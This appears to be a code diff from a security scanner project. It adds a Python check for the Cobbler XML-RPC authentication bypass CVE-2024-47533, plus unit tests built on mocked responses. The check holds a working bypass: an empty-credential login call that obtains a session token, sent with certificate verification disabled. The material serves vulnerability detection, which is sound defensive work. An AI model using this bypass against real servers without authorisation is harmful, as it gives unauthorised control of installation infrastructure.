Ostorlab · nmasdoufi-ol · Nov 22, 2024 · Nov 21, 2024 · Nov 21, 2024 · Nov 21, 2024
@@ -0,0 +1,122 @@
+"""Agent Asteroid implementation for CVE-2024-47533"""
+
+import xmlrpc.client
+import ssl
+from urllib import parse as urlparse
+import datetime
+import re
+
+import requests
+from requests import exceptions as requests_exceptions
+from xml.parsers import expat
+
+from agent import definitions
+from agent.asteroid_agent import logger
+from agent.exploits import webexploit
+from agent import exploits_registry
+
+VULNERABILITY_TITLE = "Cobbler XMLRPC Interface Authentication Bypass"
+VULNERABILITY_REFERENCE = "CVE-2024-47533"
+VULNERABILITY_DESCRIPTION = """Cobbler, a widely used Linux installation server for network installation environments, contains a critical 
+    authentication flaw in versions 3.0.0 to 3.2.2 and 3.3.6. This vulnerability is due to a defective function, 
+    bypassing authentication checks for the Cobbler XML-RPC interface."""
+RISK_RATING = "CRITICAL"
+DEFAULT_TIMEOUT = datetime.timedelta(seconds=30)
+
+JSON_INDICATORS = ['"cobbler_api"', '"mappings"', '"settings"']
+XML_INDICATORS = ["<?xml", "<methodCall>", "<methodName>", "<params>"]
+
+accept_pattern = [
+    re.compile("|".join(JSON_INDICATORS)),
+    re.compile("|".join(XML_INDICATORS)),
+]
+
+
+def _can_bypass_auth(target_url: str) -> bool:
+    """Attempt to log in with invalid credentials to verify authentication bypass."""
+    try:
+        if target_url.startswith("https://") is True:
+            ssl_context = ssl.create_default_context()
+            ssl_context.check_hostname = False
+            ssl_context.verify_mode = ssl.CERT_NONE
+
+            transport = xmlrpc.client.SafeTransport(
+                use_datetime=True, context=ssl_context
+            )
+            conn = xmlrpc.client.ServerProxy(target_url, transport=transport)
+        else:
+            conn = xmlrpc.client.ServerProxy(target_url)
+
+        token = conn.login("", -1)
+
+        logger.info("Authentication bypass succeeded with token: %s", token)
+        return True
+
+    except xmlrpc.client.Fault as e:
+        logger.error("Authentication attempt resulted in Fault: %s", e)
+        return False
+
+    except expat.ExpatError as e:
+        logger.error("XML parsing error occurred: %s", str(e))
+        return False
+
+    except (
+        xmlrpc.client.ProtocolError,
+        ssl.SSLError,
+        requests_exceptions.RequestException,
+    ) as e:
+        logger.error("Connection error occurred: %s", str(e))
+        return False
+
+
+@exploits_registry.register
+class CVE202447533CobblerExploit(webexploit.WebExploit):
+    accept_request = definitions.Request(
+        method="GET",
+        path="/cobbler_api",
+    )
+
+    accept_pattern = accept_pattern
+
+    metadata = definitions.VulnerabilityMetadata(
+        title=VULNERABILITY_TITLE,
+        description=VULNERABILITY_DESCRIPTION,
+        reference=VULNERABILITY_REFERENCE,
+        risk_rating=RISK_RATING,
+    )
+
+    def check(self, target: definitions.Target) -> list[definitions.Vulnerability]:
+        """Check if the target is vulnerable to the authentication bypass."""
+        vulnerabilities: list[definitions.Vulnerability] = []
+        target_endpoint = urlparse.urljoin(target.origin, self.accept_request.path)
+
+        if _can_bypass_auth(target_endpoint) is True:
+            logger.info("Authentication bypass successful.")
+            vulnerabilities.append(self._create_vulnerability(target))
+        else:
+            logger.info("Authentication bypass failed.")
+
+        return vulnerabilities
+
+    def accept(self, target: definitions.Target) -> bool:
+        """Override the accept method to match JSON or XML response patterns."""
+        target_endpoint = urlparse.urljoin(target.origin, self.accept_request.path)
+
+        try:
+            req = requests.Request(
+                method=self.accept_request.method,
+                url=target_endpoint,
+            ).prepare()
+
+            if self.accept_request.headers is not None:
+                self.accept_request.headers.update(req.headers)
+                req.headers = self.accept_request.headers  # type: ignore
+            resp = self.session.send(req, timeout=DEFAULT_TIMEOUT.seconds)
+
+        except requests_exceptions.RequestException:
+            return False
+
+        for pattern in self.accept_pattern:
+            if pattern.search(resp.text) is not None:
+                return True
+        return False
@@ -0,0 +1,195 @@
+"""Unit tests for Agent Asteroid: CVE-2024-47533"""
+
+import xmlrpc.client
+from unittest import mock
+
+import requests
+import requests_mock as req_mock
+
+from agent import definitions
+from agent.exploits import cve_2024_47533
+
+
+MOCK_VULNERABLE_RESPONSE = """
+    <?xml version='1.0'?>
+    <methodResponse>
+        <params>
+            <param>
+                <value>
+                    <string>token123</string>
+                </value>
+            </param>
+        </params>
+    </methodResponse>
+    """
+
+MOCK_SECURE_RESPONSE = """<?xml version='1.0'?>
+    <methodCall>
+    <methodName>login</methodName>
+    <params>
+    <param>
+    <value><string></string></value>
+    </param>
+    <param>
+    <value><int>-1</int></value>
+    </param>
+    </params>
+    </methodCall>"""
+
+
+def testCVE202447533_whenVulnerable_reportFinding(
+    mocker: req_mock.mocker.Mocker, requests_mock: req_mock.mocker.Mocker
+) -> None:
+    """Unit test for CVE-2024-47533: case when target is vulnerable."""
+
+    mock_server_proxy = mock.MagicMock()
+    mock_server_proxy.login.return_value = "token123"
+    mocker.patch("xmlrpc.client.ServerProxy", return_value=mock_server_proxy)
+
+    requests_mock.get(
+        "http://localhost:80/cobbler_api",
+        text=MOCK_VULNERABLE_RESPONSE,
+        status_code=200,
+    )
+
+    exploit_instance = cve_2024_47533.CVE202447533CobblerExploit()
+    target = definitions.Target("http", "localhost", 80)
+
+    vulnerabilities = exploit_instance.check(target)
+
+    assert len(vulnerabilities) > 0
+    vulnerability = vulnerabilities[0]
+    assert vulnerability.entry.title == "Cobbler XMLRPC Interface Authentication Bypass"
+    assert vulnerability.technical_detail == (
+        "http://localhost:80 is vulnerable to CVE-2024-47533, Cobbler XMLRPC Interface Authentication Bypass"
+    )
+
+
+def testCVE202447533_whenSecure_reportNothing(
+    requests_mock: req_mock.mocker.Mocker,
+) -> None:
+    """Unit test for CVE-2024-47533: case when target is secure."""
+
+    requests_mock.get(
+        "http://localhost:80/cobbler_api",
+        text=MOCK_SECURE_RESPONSE,
+        status_code=200,
+    )
+
+    exploit_instance = cve_2024_47533.CVE202447533CobblerExploit()
+    target = definitions.Target("http", "localhost", 80)
+
+    vulnerabilities = exploit_instance.check(target)
+
+    assert len(vulnerabilities) == 0
+
+
+def testCVE202447533_whenConnectionError_reportNothing(
+    requests_mock: req_mock.mocker.Mocker,
+) -> None:
+    """Unit test for CVE-2024-47533: case when a connection error occurs."""
+    requests_mock.get(
+        "http://localhost:80/cobbler_api",
+        exc=requests.exceptions.ConnectionError,
+    )
+
+    exploit_instance = cve_2024_47533.CVE202447533CobblerExploit()
+    target = definitions.Target("http", "localhost", 80)
+
+    vulnerabilities = exploit_instance.check(target)
+
+    assert len(vulnerabilities) == 0
+
+
+def testCVE202447533_when404_reportNothing(
+    requests_mock: req_mock.mocker.Mocker,
+) -> None:
+    """Unit test for CVE-2024-47533: case when the endpoint returns 404."""
+
+    requests_mock.get(
+        "http://localhost:80/cobbler_api",
+        status_code=404,
+    )
+
+    exploit_instance = cve_2024_47533.CVE202447533CobblerExploit()
+    target = definitions.Target("http", "localhost", 80)
+
+    vulnerabilities = exploit_instance.check(target)
+
+    assert len(vulnerabilities) == 0
+
+
+def testCVE202447533_whenAcceptRespondsWithJsonPattern_shouldProcessNormally(
+    requests_mock: req_mock.mocker.Mocker,
+) -> None:
+    """Unit test for CVE-2024-47533: accept method matches JSON indicators."""
+
+    requests_mock.get(
+        "http://localhost:80/cobbler_api",
+        text='{"cobbler_api": "active", "settings": {}}',
+        status_code=200,
+    )
+
+    exploit_instance = cve_2024_47533.CVE202447533CobblerExploit()
+    target = definitions.Target("http", "localhost", 80)
+
+    result = exploit_instance.accept(target)
+
+    assert result is True
+
+
+def testCVE202447533_whenAcceptRespondsWithXmlPattern_shouldProcessNormally(
+    requests_mock: req_mock.mocker.Mocker,
+) -> None:
+    """Unit test for CVE-2024-47533: accept method matches XML indicators."""
+
+    requests_mock.get(
+        "http://localhost:80/cobbler_api",
+        text=MOCK_SECURE_RESPONSE,
+        status_code=200,
+    )
+
+    exploit_instance = cve_2024_47533.CVE202447533CobblerExploit()
+    target = definitions.Target("http", "localhost", 80)
+
+    result = exploit_instance.accept(target)
+
+    assert result is True
+
+
+def testCVE202447533_whenAcceptIsFalse_shouldNotProcessed(
+    requests_mock: req_mock.mocker.Mocker,
+) -> None:
+    """Unit test for CVE-2024-47533: accept method fails when no pattern matches."""
+
+    requests_mock.get(
+        "http://localhost:80/cobbler_api",
+        text="Unrelated content without JSON or XML indicators.",
+        status_code=200,
+    )
+
+    exploit_instance = cve_2024_47533.CVE202447533CobblerExploit()
+    target = definitions.Target("http", "localhost", 80)
+
+    result = exploit_instance.accept(target)
+
+    assert result is False
+
+
+def testCVE202447533_whenFaultErrorOccurs_authBypassShouldFail(
+    mocker: req_mock.mocker.Mocker,
+) -> None:
+    """Unit test for _attempt_auth_bypass: handles xmlrpc Fault error."""
+
+    mock_server_proxy = mock.MagicMock()
+    mock_server_proxy.login.side_effect = xmlrpc.client.Fault(
+        faultCode=1, faultString="Authentication failed"
+    )
+    mocker.patch("xmlrpc.client.ServerProxy", return_value=mock_server_proxy)
+
+    exploit_instance = cve_2024_47533.CVE202447533CobblerExploit()
+    target = definitions.Target("http", "localhost", 80)
+
+    vulnerabilities = exploit_instance.check(target)
+
+    assert len(vulnerabilities) == 0